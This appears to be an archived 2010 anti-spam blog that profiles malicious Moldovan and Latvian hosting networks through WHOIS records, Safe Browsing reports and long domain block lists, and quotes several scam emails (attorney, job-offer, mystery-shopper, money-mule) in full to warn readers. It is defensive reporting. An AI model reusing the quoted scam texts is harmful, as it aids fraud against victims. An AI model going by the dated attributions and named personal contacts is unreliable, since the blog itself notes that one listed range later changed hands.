Wednesday, 20 October 2010

Evil network: MD-ISP-MONITORING, AS25129 (89.187.32.0/19)

AS25129 (89.187.32.0/19) hosts a lot of refugees from another evil network, Najada. There is nothing of value in this netblock; the sites appear to offer illegal software, fake anti-virus, criminal support infrastructure, fake pharma sites and phishing.

The IP range is allocated to:


inetnum:         89.187.52.0 - 89.187.55.255
netname:         MD-ISP-MONITORING
remarks:         INFRA-AW
descr:           Hi-speed users
country:         MD
admin-c:         ABA3-RIPE
tech-c:          ABA3-RIPE
status:          ASSIGNED PA
mnt-by:          MONITORING-MNT
source:          RIPE # Filtered
person:          Alexander Basunov
address:         R&D Centre "Monitoring"
address:         Komsomolskaya 2a
address:         3200 Bendery
address:         Moldova
e-mail:          hostmaster@bendery.md
mnt-by:          MONITORING-MNT
nic-hdl:         ABA3-RIPE
phone:           +37377786335
source:          RIPE # Filtered
% Information related to '89.187.32.0/19AS25129'
route:           89.187.32.0/19
descr:           R&DC Monitoring, PA
origin:          AS25129
mnt-by:          MONITORING-MNT
source:          RIPE # Filtered

The myWOT reputation of these sites is very bad [CSV]. My recommendation is that you block 89.187.52.0 - 89.187.55.255 (89.187.32.0/19), or alternatively null route the sites below.

Anonymousstats.com
Storageprotectorx.com
Hostlogarea.in
Blogblogfirst.in
Bestblogbest.in
High-blogicio.eu
High-blogster.eu
High-picicio.eu
Hostspacebest.in
Mega-blogster.eu
Mega-picicio.eu
Mega-picster.eu
Turbo-blogster.eu
Turbo-imagicio.eu
A-lot-of-appz.com
Activation-codes.net
Activationcrack.net
Any-filez.net
Check-4-apps.org
Crack-file.net
Crack-serial-numbers.net
Crack-usa.com
Crackandcrack.com
Crackcrack.net
Crackcrackcrack.net
Crackdelivery.net
Crackdownload.net
Crackkeys.net
Crackorginal.net
Crackpatch.net
Crackpatchkeygen.net
Crackprokeygen.net
Crackrapidshare.net
Cracks-explorer.net
Crackserialcode.net
Crackserialcodes.net
Crackserialkey.net
Crackserialkeygens.net
Crackserialkeys.net
Crackserialnumber.net
Crackserialnumbers.net
Crackshare.net
Cracktrial.net
Crackwin.net
Dlfeed.com
Downloadcracks.net
Fastcrack.net
Fileserialkey.net
Free-serial.net
Freecrackdownload.net
Freekeygencrack.net
Freeserialkey.net
Fullcrackserial.net
Fullkeygen.net
Fullserialcrack.net
Fullserialnumber.net
Fullserialnumbers.net
Getserial.net
Hosthosthost.net
Key-code.net
Keygen-crack.net
Keygen-serial.net
Keygenc.net
Keygencrackpatch.net
Keygenerators.net
Keygenforserial.net
Keygenkeygen.net
Keygenned.com
Keygenpatch.net
Keygens-for-soft.org
Keygenserialcrack.net
Keygenserialnumber.net
Keygenserials.net
Keygensite.net
Keygentrial.net
Keygenwin.net
Keyproduct.net
Killtrial.net
Licensekeygen.net
Maximumwarez.com
Microposters.org
Newserialcracks.net
Numberserial.net
Orginalcrack.net
Patchcrack.net
Registrationcode.net
Registrationkey.net
Registrationkeys.net
Seialkeymaker.net
Serial-codes.net
Serial-crack.net
Serial-key-generator.net
Serial-keygen.net
Serial-keygens.net
Serial-keys.net
Serial-number-crack.net
Serial-numbers-crack.net
Serialcodesfor.net
Serialcrackcodes.net
Serialcrackkeygen.net
Serialkeycodes.net
Serialkeycrack.net
Serialkeygencracks.net
Serialkeygenerator.net
Serialkeygenpro.net
Serialkeygens.net
Serialkeynumber.net
Serialkeynumbers.net
Serialnumbercode.net
Serialnumbercrack.net
Serialnumberfor.net
Serialnumberkeygen.net
Serialnumberscrack.net
Serialpost.net
Serialserial.net
Shared-fro-you.com
Shared-news.net
Soft-dont-stop.org
Softwareserialnumber.net
Softwareserialnumbers.net
Superpagehost.in
Thecrackserial.net
Trusted-warez.com
Vipcrack.net
Warezpad.net
Wincracks.net
Bestwebspace.in
Besthostfree.in
Gigimon.net
Beribegi.com
Beribegi1.com
Googlemaps5.com
Hostnetblog.in
Judatrafic.com
Trafficforalz.com
Trafficforalz.org
Blogareaweb.in
Hostfreearea.in
Firstblogbest.in
Bloghomelog.in
Netnetblog.in
Bestspacelog.in
Firstblogspace.in
Brendonlfile.org
Coderstrin.org
Codesfreling.org
Cripesload.org
Daungradeoffs.org
Falenslaodins.org
Flaasnesfile.org
Fre-lan-fileess.org
Freecodonlaans.org
Frefrefiless.org
Friilasopn.org
Frilandfile.org
Grandisfreshdown.org
Hostsuperarea.in
Internalsfile.org
Jebaunfols.org
Kachaenfailisi.org
Linefirtsfilee.org
Loadslinecod.org
Med-on-downl.org
Media-delison.org
Media-l-file.org
Medlinefils.org
Ogrisfile.org
Oldinfilefree.org
Onl-for-fils.org
Orange-flis.org
Organisupload.org
Qaredline.org
Qwerfileorg.org
Sigruiqwe.org
Skachfiles.org
Traedenopenres.org
Vades-loadec.org
Valdec-lains.org
Youfileoke.org
Allingspl.com
Superbestfirst.in
Allingtramp.com
Freespacehost.in
Statflus4.com
Webhosthost.in
Leninvgorkax.net
Storereturn.cc
Firstclassresults.cc
Fb-cdn1.com
Installs.tv
Msdefender2011.com
Creativetmx.com
Updatetechno.com
Zverolab.com
Mynewpass.com
Downloadcheapsoft.com
Trafficforalz.net
Z0g7yail0.com
Ebayinvoice.com
Ebayitemhosting.com
Paypal-moneypak-processing.com
Backstab.biz
Cardzone.cc
D-9.cc
Ebayitemhosting.net
Megavendor.biz
Check-crypt.com
Check-domain.cn
Samclubclearance.com
Sams-clearance.com
Samsclubcl.com
Samsclubsales.com
Start-domain.cn
Free-image-uploads.com
Human-nature.org
Imagesshack.net
The-imageshack.com
Gsm-seacher-v10.ru
Blackosogs.com
Riverchick.com
Gabstreamj.com
Ecurrencynews.org
Ancoraimages.com
Mmsbonus.com
Everydayer.com
Celebrition.com
Celebritylabor.com
Getimpressed.com
Goldouncemedia.com
Hollywoodmajestic.com
Lincolnfinserv.com
Mcknightportugal.org
Metacaffe.info
Misteriks.net
Nanosolutionssoft.com
Peksone.net
Peree.ru
Tv-onlines.net
Tv-world-online.net
Vaulttech13.cn
Webarh.com
Vk-base.org
Vksledi.ru
Aniroti.com
Aniroti.net
Pharmpills.net
Mediashares.org
Video-shares.com
Video-shares.net
Videoall.net

Attorney scam: Oak Spring Canola Farms

This is a type of scam email that I haven't seen before, in this case targeting lawyers, especially dumb ones (and I have certainly seen a lot of those before).

From: Thomas Shepherd <oakspringcanolafarms@hotmail.com>
Date: 20 October 2010 02:40
Subject: Representation
Counsel,

The management of Oak Spring Canola Farms seek the urgent attention of your law firm in regards to a breach of sale contract. I seek your urgent intervention in this matter because of its urgency, please advise me if this is your area of law practice so i can bring you into the loop. Expect your urgent responds at your earliest time.

Yours Sincerely,

Thomas Shepherd

I don't even know what a Canola Farm is, but the IP address this originates from is 74.210.20.6 in Canada, which is blacklisted for spamming out another scam (via surriel.com):

From: "Bowen Culbert" <culbert.cosmetics@gmail.com>
Subject: JOB OFFER
Date: Mon, 4 Oct 2010 22:09:02 -0400

CULBERT COSMETICS COMPANY
Culbert Cosmetics Company
5 Sheddingdean Business Centre
Burgess Hill, SussexRH15 8QY
United Kingdom
Phone:  1273906031
Dear Sir/Madam,

I am Mr. Bowen Culbert. I represent Culbert Cosmetics Company based here in United Kingdom. We need company representatives in Europe, America, and Canada. So If you are interested in this business transaction, forward to us your contact information so we can furnish you with the job description. Please if you are interested to work with us in good faith and honesty, get back to us by filling the information below:

Full Names..................
Full Address................
City........................
State.......................
Postal Code.................
Country.....................
sex.........................
Age.........................
Home Phone..................
Cell Phone..................
Fax.........................
Occupation..................
Company Name................

Very Respectfully,

Bowen Culbert
Managing Director
Culbert Cosmetics Company
5 Sheddingdean Business Centre
Burgess Hill, SussexRH15 8QY
United Kingdom 
culbert.cosmetics@gmail.com
Phone:  1273906031

"Culbert Cosmetics Company" is more obviously a scam, so clearly "Oak Spring Canola Farms" is too.

It turns out that scamming lawyers can be quite lucrative, but these scams tend to follow established patterns. There's a pretty good repository of attorney email scams, some of which are quite hard to tell apart from genuine client enquiries.

Saturday, 16 October 2010

xshopperjob.com mystery shopper scam

A mystery shopper scam to avoid, from a domain registered in Russia.


Date: 16 October 2010 15:48
Subject: Re: MS Shopper [$800/week]

Thank you for your interest in the MS Shopper position.
Our company conducts surveys and evaluates other companies in order to help them achieve their performance goals.
We offer an integrated suite of business solutions that enables corporations to achieve tangible results in the marketplace.

We get hired by other companies and act like customers to find out how they are handling their services in relation to their customers.
MS Shopping is the most accurate and reliable tool a business can use to gather information regarding their actual customer service performance at the moment of truth.
This moment of truth is not when the staff is on their best behavior because the boss is around - it is when they interact with customers during their normal daily routines.

This is where you, the MS Shopper, come in.
You pose as an ordinary customer and provide feedback of both factual observations (ex...the floor was free of debris)
and your own opinions (ex...I felt that the temperature in the establishment was too cold).

MS Shoppers must remain anonymous. You must act as a regular customer and be careful not to do anything that would reveal you as a shopper.
An inexperienced shopper could tip off the staff to his/her identity by asking for the manager's name for no clear or appropriate reason.
If you are going to be bringing someone with you on the shop, make sure you educate them about the process as well.
Beware that even whispers can be overheard by employees. If anyone notices you are a shopper,
you can bet that word will quickly spread around the establishment and you will get some of the best customer service in town.

No company can afford to have a gap between the promise of quality and its actual delivery, that's why leading corporations look to us,
the nation's premiere MS shopping and customer experience measurement company.

In order for a business to effectively compete in today's economy, they must be prepared to meet the challenge of increasing sales by:
* Retaining existing customers
* Acquiring new customers
* Creating word-of-mouth advocacy
* Improving customer loyalty

Once we have a contract to do so, you would be directed to the company or outlet, and you would be given
the funds you need to do the job(either purchase merchandise or require services), after which you would write a detailed report of your experience.

Examples of details you would forward to us are:
1) How long does it take to get served.
2) Politeness of the attendant.
3) Customer service professionalism.
4) Sometimes you might be required to upset the attendant, to see how they deal with difficult clients.

Then we turn the information over to the company executives and they will carry out their own duties in improving their services.
Most companies employ our assistance when people complain about their services, or when they feel there is a need for them to improve upon their customer service.
Our company partners with you to implement proven MS shop auditing and surveying strategies that provide critical information about customer experiences.

You will be paid a commission of $100 for every duty you carry out, and bonus on your transportation allowance.
Your task will be to evaluate and comment on customer service in a wide variety of restaurants, retail stores, casinos,
shopping malls, banks and hotels in your area.


Qualities of a good MS Shopper:
* Is 21 years of age or older
* Loves to go shopping
* Is fair and objective
* Is ON TIME
* Is very observant and able to focus on details
* Is fairly intelligent
* Has patience
* Is detail oriented
* Is practical
* Types well
* Is trustworthy
* Explains well in writing
* Is discreet
* Loves to learn
* Handles deadlines
* Has full internet access (at home or at work)

MS Shopping is fun and exciting but also must be approached very seriously and is definitely not for everyone.

If you are interested in applying for consideration as a MS Shopper do send in your information: Domiciano@xshopperjob.com
Full Name:
Address:
City:
State:
Zip Code:
Phone Number:
Age:
Occupation:

As soon as we receive your information we will add you to our database and we will look for locations in your area that needs to be evaluated.

The possition is only available for United States.

Thank you,
Domiciano MECHOSO


The domain name is registered in Russia; the contact details could well be fake:

Domain Name: XSHOPPERJOB.COM

Registrant:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Creation Date: 15-Oct-2010 
Expiration Date: 15-Oct-2011

Domain servers in listed order:
    ns2.reg.ru
    ns1.reg.ru

Administrative Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Technical Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354

Billing Contact:
    Beatles Steel
    Alexey Zhukov        (oloperz@usa.com)
    Novopeschanaya 56 8
    Moscow
    Moscow,145672
    RU
    Tel. +7.4999433354


All mail is handled by mx.yandex.ru in Russia, so this does look like a Russian operation. No surprises there. The email address is fairly well known for fraudulent activity too. Avoid.

Friday, 15 October 2010

nttemps.net / ntmps.net / ntmps.com recruitment scam

Net-Temps, Inc is a real company; these emails do not come from Net-Temps, Inc and follow on from a series of fraudulent emails pretending to be from this company. This time around the scammers appear to be using the domains nttemps.net and ntmps.net (update: they are also using ntmps.com).

These so-called jobs are usually money mule (money laundering) operations or some other criminal "back office" activity which should be avoided at all costs.

Date: 15 October 2010 16:48
Subject: Hiring (part-time)

Looking for a job? My name is Juliette Barnes, I am a recruiting manager of NetTemps Inc, a recruiting agency for direct-hire, contract, and freelance professionals within various professions.

Today I would like introduce some part-time and virtual office vacancies in the spheres of Advertising, Education, Engineering, Finance, Health care, Information technology, Media, Real estate and Transportation.

If you are interested to learn more about the jobs offered, please get back to me, providing your name and contact number.

We are eager to help you find a better job and improve your career!
If you have questions, please do not hesitate to e-mail me on:
e u r o p e @ n t m p s . n e t      [please delete spaces in the email address before sending it to us]

Yours sincerely,
Juliette Barnes
NetTemps Inc
======================================

Mail for these two domains is handled by 67.222.149.107 [BlueSquare Data, UK]; the nameservers are ns1.dollar-canada.com and ns1.nevoconsulting.net, both hosted on 67.23.235.236 [HostDime, Orlando], which are also used by the domains lovestorybook.net and xpharmx.com.

Monday, 11 October 2010

Evil network: Specialist Ltd / Specialist-ISP-PI2 AS48691(194.28.112.0/22)

Specialist Ltd is a fairly large netblock containing a small number of very bad hosts and nothing else. Registered to a company in Moldova, Specialist looks like another part of the Latvian / Moldovan / Bosnian black hat network which supports all sorts of organised crime.

inetnum:         194.28.112.0 - 194.28.115.255
netname:         Specialist-ISP-PI2
descr:           Specialist, Ltd.
country:         MD
org:             ORG-SL206-RIPE
admin-c:         VP2841-RIPE
tech-c:          AB16163-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-HM-PI-MNT
mnt-lower:       RIPE-NCC-HM-PI-MNT
mnt-by:          SPECIALIST-MNT
mnt-routes:      SPECIALIST-MNT
mnt-domains:     SPECIALIST-MNT
source:          RIPE # Filtered

organisation:    ORG-SL206-RIPE
org-name:        Specialist, Ltd
org-type:        OTHER
descr:           Specialist, Ltd, Rybnitsa, MD
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-12921
phone:           +373-693-18189
phone:           +373-777-65071
fax-no:          +373-555-43073
mnt-ref:         MONITORING-MNT
abuse-mailbox:   abuse@lan-rybnitsa.com
mnt-by:          SPECIALIST-MNT
source:          RIPE # Filtered

person:          Vladimir Pilan
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-12921
fax-no:          +373-555-43073
nic-hdl:         VP2841-RIPE
source:          RIPE # Filtered
mnt-by:          SPECIALIST-MNT

person:          Anatoly Belitsky
address:         I. Soltysa 12, Rybnitsa, MD
phone:           +373-777-65071
fax-no:          +373-555-43073
nic-hdl:         AB16163-RIPE
source:          RIPE # Filtered
mnt-by:          SPECIALIST-MNT

% Information related to '194.28.112.0/22AS48691'

route:           194.28.112.0/22
descr:           Specialst-route2
origin:          AS48691
mnt-by:          SPECIALIST-MNT
source:          RIPE # Filtered


Google's Safe Browsing diagnostics only show part of the story:

Safe Browsing
Diagnostic page for AS48691 (SPECIALIST)

What happened when Google visited sites hosted on this network?

    Of the 28 site(s) we tested on this network over the past 90 days, none served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-09, and the last time suspicious content was found was on 2010-10-09.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 3 site(s) on this network, including, for example, 0jiqjmk3.ru/, fngmadopx.ru/, bingosyssaver24.com/, that appeared to function as intermediaries for the infection of 2 other site(s) including, for example, rttattorneys.com/, mygooglephotos.webs.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 15 site(s), including, for example, 194.28.112.0/, xebetak.ru/, bingosyssaver24.com/, that infected 865 other site(s), including, for example, slutdrive.com/, stvid.com/, amatura.com/.

The MyWOT reputation of the sites on this network is very bad [CSV]. It is unlikely that this netblock will be used for anything other than evil purposes, so blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea; alternatively, block the domains listed below.

Globdomain.ru
Greenter.ru
Photois.org
Style-vk.com
Vkstyle.net
07tqqwem.ru
0jiqjmk3.ru
0qhe7y6o.ru
0scoubpk.ru
0st44x7z.ru
0w6scx6a.ru
1001jimm.ru
23qjmdic.ru
27wuxt37.ru
28iue5ri.ru
28jnbuak.ru
2be-trends.ru
2poaxz3k.ru
2ti0pv3y.ru
2zm5mcep.ru
30zcz8ot.ru
32iafdnp.ru
3a0stbqe.ru
3jruf6nc.ru
40ktc2tn.ru
4hp2ag6c.ru
4jfhywir.ru
4mausx2w.ru
4y8pqcby.ru
5c4aiwcs.ru
5gsco2w5.ru
5q4eyd2w.ru
5znhff2s.ru
6dpg3khy.ru
6ojj8sks.ru
6pgsqndh.ru
777wxpc7.ru
78w88epi.ru
83qndvnj.ru
868r5e0b.ru
8n7pnyyr.ru
8reclame.ru
Alwaysprokladka.com
Artenhart.ru
Artiestenloket.ru
Ashcbzbbbz.ru
Aslkjhqeqw.ru
Atyyyopg.ru
Azaamdwo.ru
Bim6xe3t.ru
Bjpfk0rm.ru
Boskoop2nepal.info
Bossal.info
Bramrozafestival.info
Brand-central.info
Bvo62o0i.ru
Bwzz5c32.ru
C28xd2ck.ru
C6iv0x3j.ru
Cafetariaroyal.info
Cateredchaletfrankrijk.ru
Cf8sagkn.ru
Childsurvival.info
Creedenceclearwatersurvival.info
Crosslinks-services.ru
Csokolom.ru
Cw5k47ye.ru
D6vjbbv6.ru
Damesfutsal.info
Datadigital.info
Dekeukenbouwer.ru
Dotyuzcifl.ru
Duz5n2ca.ru
Dwunvuum.ru
Ea7xh4vw.ru
Ef6j6u0r.ru
F50rbdb8.ru
Farmsurvival.info
Fbbktj2z.ru
Fhlaenyxor.ru
Fimpvs8t.ru
Fppf2h28.ru
Freemobiledns.mobi
Gayq8rgx.ru
Gdwre766.ru
Gopchicken.ru
Gscrystal.info
H6poe6or.ru
Haaglandia-futsal.info
Hc6zxms4.ru
Hem3oxjh.ru
Henness.ru
Hetkwispelaartje.ru
Hotcrystal.info
Huisenenergielabel.info
Hvdwal.info
I4nhjopf.ru
I7in0b64.ru
Ic2u8kk0.ru
Ihbkbzcm.ru
Ihcswgcz.ru
Ihjddgqs.ru
Inventivecapital.info
Io060fcn.ru
Io0yfyc8.ru
J6kb3pfa.ru
J7k6xze2.ru
J7oc5v3o.ru
Jbsc.ru
Jimakolo.ru
Jimm2rusru.ru
Jimmbly.ru
Jimmdlyadjimmru.ru
Jimmdlyasamsa.ru
Jimmdns1.ru
Jimmdns3.ru
Jimmdns4.ru
Jimmdns5.ru
Jimmdnsru.ru
Jimmfanfik.ru
Jimmfantasy2.ru
Jimmfaqru.ru
Jimmforyouru.ru
Jimmfreeru.ru
Jimmgps.ru
Jimmgpsru.ru
Jimmhobbyrus.ru
Jimmhostoryru.ru
Jimmhtcru.ru
Jimmicqlop.ru
Jimmkolipo12.ru
Jimmkonstructru.ru
Jimmlocationrus.ru
Jimmlocationss.ru
Jimmlokolok.ru
Jimmmobru2.ru
Jimmmobru4.ru
Jimmnewsru.ru
Jimmokiloi.ru
Jimmonlineru.ru
Jimmonlinerus.ru
Jimmosuk.ru
Jimmplanetka.ru
Jimmpolice12.ru
Jimmpolomba.ru
Jimmpoloniy.ru
Jimmpozor.ru
Jimmprofile.ru
Jimmprofilerus.ru
Jimmrurus.ru
Jimmsamsungru.ru
Jimmtebepii.ru
Jimmtrahaet.ru
Jimmvmozg.ru
Jimmyblo.ru
Jnano5gh.ru
Jokerjokk.ru
Jongfcmp.ru
Josal.info
Joy-adventure.ru
Kadefestival.info
Kefpvbsi.ru
Kfgemaae.ru
Kleinhengstdael.info
Kojvdspw.ru
Koliander.ru
Langsdewal.info
Liononlinensd.ru
Lipsticpi.ru
Listikjimm.ru
Literatuurfestival.info
Lokipol.ru
Lopolok.ru
Macdental.info
Maruuhp2.ru
Meeenti.ru
Mipolok.ru
Mjbims7m.ru
Mokojikol.ru
Momomom.ru
Mrt0zqcb.ru
Multimediamagazine.ru
Mvanderwal.info
Mxek5t5g.ru
N7wg0g5w.ru
Naaminkristal.info
Noordelijkkoorfestival.info
Nv8os6yt.ru
Nxo48a7g.ru
O3wg4sya.ru
Ocggnaif.ru
Ofz5qzgu.ru
Oh7iumr7.ru
Ohjbkyudil.ru
Ojimmx4.ru
Ojimmx6.ru
Okiolk.ru
Onlinecheapsdo.ru
Onlinefeeds.ru
Onlinefreeze.ru
Onlinegearsd.ru
Onlinegop.ru
Onlinejimmmovse.ru
Onlinejobsfrees.ru
Onlinelongjorn.ru
Onlineonlkiok.ru
Onlinerujimm.ru
Onlineteammaster.ru
Onlinetechnicals.ru
Onlineworkers.ru
Onlinkrt.ru
Oordfestival.info
Orthocapelle.ru
Patronah.ru
Paulvosdewael.info
Petstotal.info
Piscine-ecologique.ru
Pororkol.ru
Praktijkdebergkristal.info
Prc6t7z3.ru
Psxdv0nr.ru
Pvbsiy5y.ru
Q2auv3at.ru
Q3ysg05s.ru
Q8juhmhh.ru
Qbecqe0s.ru
Qec5beqn.ru
Qzhvlpso.ru
Rebootfestival.info
Renarental.info
Retrosensual.info
Rickenchantal.info
Rietfestival.info
Rikosdhu.ru
Ronaldknol.ru
Rs3gpd0m.ru
Rudjimmdjimm.ru
Rvvcoal.info
S4gvhd35.ru
S748eop4.ru
Sadjbamn.ru
Sadjkadkasj.ru
Schutrups.ru
Selavis.ru
Sgivnn0t.ru
Smart-accountant.ru
Spankabel.info
Srowig.ru
Stichtingderevival.info
Stiltefestival.info
Stpf6qpv.ru
Sv4wmtxj.ru
T0a2afyq.ru
T3tzynvj.ru
T8hftjx8.ru
Tinkel-bel.info
Transfusionfestival.info
Trustincompanies.ru
Twqhde3i.ru
U5fyfzjt.ru
Ucf47vnu.ru
Uplcash.com
Vaxlgfsb.ru
Vdmi2fz8.ru
Vecgndv8.ru
Vetstival.info
Vgksry7k.ru
Vicl.info
Vk0urcvu.ru
Vroegop.ru
W8iroomb.ru
Webeval.info
Wiiqiieiqa.ru
Worldfuneral.info
Wsewf0rw.ru
Wyvbe7vg.ru
X7p03g0j.ru
X8zv6433.ru
Xni27ftd.ru
Xthjrgxz.ru
Xu44i03y.ru
Yearsforfan.ru
Yi0ewtmd.ru
Yldpkozfmi.ru
Yo4nyzyc.ru
Yp7o07nq.ru
Z26hggcb.ru
Z7u4wtfe.ru
Zatuhnichmo.com
Zsrd4xj5.ru
Zumbafestival.info
Zxcvsbrds.ru
Zznks8fh.ru
Fijicool.com
1l1i16b0.com
Nl6fa53.com
Fruitboss.ru
Katamizo.info
Promoup.info
Partnerspromo.info
Zumnox.info
Bingosyssaver21.com
Bingosyssaver22.com
Bingosyssaver23.com
Bingosyssaver24.com
Bingosyssaver25.com
Bingosyssaver26.com
Bingosyssaver27.com
Bingosyssaver28.com
Bingosyssaver29.com
Bingosyssaver30.com
Freerobertodefeater.com
Myrobertodefeater.com
Newrobertodefeater.com
Robertodefeater.com
Robertodefeaternow.com
Robertodefeateronline.com
Robertodefeaters.com
Robertodefeatersite.com
Robertodefeaterstore.com
Therobertodefeater.com
Claerprotection11.com
Claerprotection12.com
Claerprotection13.com
Claerprotection14.com
Claerprotection15.com
Claerprotection16.com
Claerprotection17.com
Claerprotection18.com

[Updated] Evil network: Donstroy Ltd AS29557 (194.8.250.0/23)

UPDATE: this IP range is now used by a completely different organisation, the malicious activity is gone and the block is safe to use. However, the post will remain up for research purposes.

Another network worth blocking: Donstroy Ltd appears to be a Latvian entity hosting in Moldova, closely affiliated with Sagade Ltd, who are one of the most scummy networks around at the moment.

The WHOIS details show a tell-tale link to Sagade in the email address:

inetnum:         194.8.250.0 - 194.8.251.255
netname:         Donstroy-1
descr:           Donstroy Ltd.
country:         LV
org:             ORG-DL107-RIPE
admin-c:         JS1050
tech-c:          JS1050
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          MNT-DONSTROY
mnt-routes:      MNT-DONSTROY
mnt-domains:     MNT-DONSTROY
source:          RIPE # Filtered

organisation:    ORG-DL107-RIPE
org-name:        Donstroy Ltd.
org-type:        OTHER
address:         Kalinina 19, 6, Bendery, Moldova
e-mail:          sagade95@gmail.com
mnt-ref:         MNT-DONSTROY
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

person:          Juris Sahurovs
address:         Rezekne Darzu iela 21
phone:           +37120034981
nic-hdl:         JS1050
e-mail:          sagade95@gmail.com
source:          RIPE # Filtered

% Information related to '194.8.250.0/23AS29557'

route:           194.8.250.0/23
descr:           donstroy-route-1
origin:          AS29557
mnt-by:          MNT-DONSTROY
source:          RIPE # Filtered

Google's Safe Browsing diagnostics are not good:

Safe Browsing
Diagnostic page for AS29557 (ASNOVIFORUM)

What happened when Google visited sites hosted on this network?

    Of the 42 site(s) we tested on this network over the past 90 days, 2 site(s), including, for example, fastprosearch.com/, twilightsex.cz.cc/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-10-10, and the last time suspicious content was found was on 2010-10-10.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, manoso.cz.cc/, noaos1.cz.cc/, sunporno.cz.cc/, that appeared to function as intermediaries for the infection of 31 other site(s) including, for example, business-standard.com/, ddl-blog.org/, onlyteensx.net/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 22 site(s), including, for example, 194.8.251.0/, prostodomen.in/, globalvalidator.cz.cc/, that infected 215 other site(s), including, for example, business-standard.com/, renisyqaqir.freehostking.com/, hetivilesum.freehostking.com/.

A search against MyWOT reputations reveals a concentration of very bad sites (report here). The best thing to do is to block all traffic to 194.8.250.0 - 194.8.251.255 (194.8.250.0/23) and/or the domains listed below:

Girlongirllibido.info
Homeownersinsuranceratings.com
Testertestfree.org
Vmhostingboxx.org
Dscodec.com
Fastprosearch.com
Ttyur.com
Vlopw.com
Bmlsk.com
Bumzc.com
Fjoty.com
Fruuf.com
Hjoty.com
Nwsplt.com
Palcaug.com
Potyur.com
Uoptyr.com
Uprtx.com
Medicpillsana.com
Medicpillsbba.com
Medicpillsbia.com
Medicpillsbta.com
Medicpillscaa.com
Medicpillscea.com
Medicpillscha.com
Medicpillscia.com
Medicpillscka.com
Medicshopnas.net
Medicshopnds.net
Medicshopnks.net
Medicshopnts.net
Medicshopoes.net
Asemedic.net
Astmedic.net
Encmedic.net
Enmedic.net
Frmedic.net
Hismedic.net
Icmedic.net
Intmedic.net
Krmedic.net
Letmedic.net
Medicci.net
Medicdi.net
Medicfr.net
Medicha.net
Mediclg.net
Medicni.net
Medicnr.net
Medicpo.net
Medicpu.net
Medicri.net
Ajeslovshord.com
Akvodhhead.com
Alsodhesedhoujhd.com
Aniarioli.com
Askpressjame.com
Bejokohafder.com
Blackmodhersdep.com
Bodhlearkfil.com
Busyplakdovk.com
Cutyacttin.com
Deheverbejak.com
Dhadhaveopek.com
Dheyherevhole.com
Dovkbackbord.com
Fallanlot.com
Gavilaugddiri.com
Hadakcourse.com
Hojharedokd.com
Kameuspoukd.com
Losdsodemoss.com
Lovioinwdoli.com
Medpillsna1.com
Medpillsna2.com
Medpillsna3.com
Medpillsna4.com
Medpillsna5.com
Medpillsni1.com
Medpillsni2.com
Medpillsni3.com
Medpillsni4.com
Medpillsni5.com
Minanwaut.com
Offobjecdfamoly.com
Okchfudboy.com
Oslakdexampleas.com
Pajeukdolmaok.com
Posekipbrokj.com
Pukdraokclass.com
Redovksay.com
Resdlaujhmoss.com
Savsdadeschul.com
Sduigancdangi.com
Sliicrymuli.com
Stooddandwi.com
Suchjrikoh.com
Travilfuriwdin.com
Addsecovdtook.com
Aoutdonttdrii.com
Assiafull.com
Commoklakjuajemeak.com
Dalkplakdaor.com
Deachhodkear.com
Dhadledad.com
Dhohdhokjearly.com
Dhokjbroujhdmusd.com
Dojcourseleark.com
Domesdopdhousakd.com
Dopmedic.net
Dovardhohdhoh.com
Efimedic.net
Enemedic.net
Feetdoldakayvst.com
Femedic.net
Hamedic.net
Joldiplosd.com
Kodocedoldappear.com
Launflymost.com
Lederbojdhad.com
Letdourwere.com
Lodledellmek.com
Medshopcu1.com
Medshopcu2.com
Medshopcu3.com
Medshopcu4.com
Medshopcu5.com
Medshopde1.com
Medshopde2.com
Medshopde3.com
Medshopde4.com
Medshopde5.com
Muchplakdokly.com
Okcevhekvadch.com
Oldbesdjrik.com
Passourdu.com
Pocdurejudcold.com
Rockdomeacd.com
Rockroundsung.com
Sicondkniwgo.com
Slovkevvell.com
Soldmarkacte.com
Strovkuproad.com
Ukmedicineel.com
Ukmedicineho.com
Ukmedicineit.com
Vadchdeachmokd.com
Vekdhadjrov.com
Vhadreachmusoc.com
Vholevucemay.com
Vokdercarryjod.com
Vordeachsdud.com
Ydeamavturv.com
Advsecsmart.com
Digitall-soft.com
Extrafullprotection.com
Mypc-repair.com
Payforsec.com
Secsmartsuper.com
Smartsecadv.com
Smartsecsuper.com
Smartsecurityadvisor.com
Smartsupersecurity.com
Stable-soft.com
Supersecadvizor.com
Supersecurepay.com
Supersmartantivirus.com
Supersmartsec.com
Bbnhs.com
Bumzec.com
Ddleb.com
Drutp.com
Gasdda.com
Gradtz.com
Hewraq.com
Hgptd.com
Htresq.com
Krclear.com
Nadwq.com
Nmkop.com
Utrvc.com
Vbnrte.info
Kobqq.com
Jgtee.com
Jyiop.com
Mptim.com
Nhytx.com
Ptyre.com
Woptr.com
Yopte.com
Ypuii.com
Checkingassociateeditor.com
Bestcheckingconnect.com
Checking-associate-editor.com
Checking-associate.com
Checkingassociatemembership.com
Checkingconnectdata.com
Checkingconnectnow.com
Checkingconnectshop.com
Cogus.net
Gromz.net
Mochos.net
Zorter.net
Movies-celeb.info
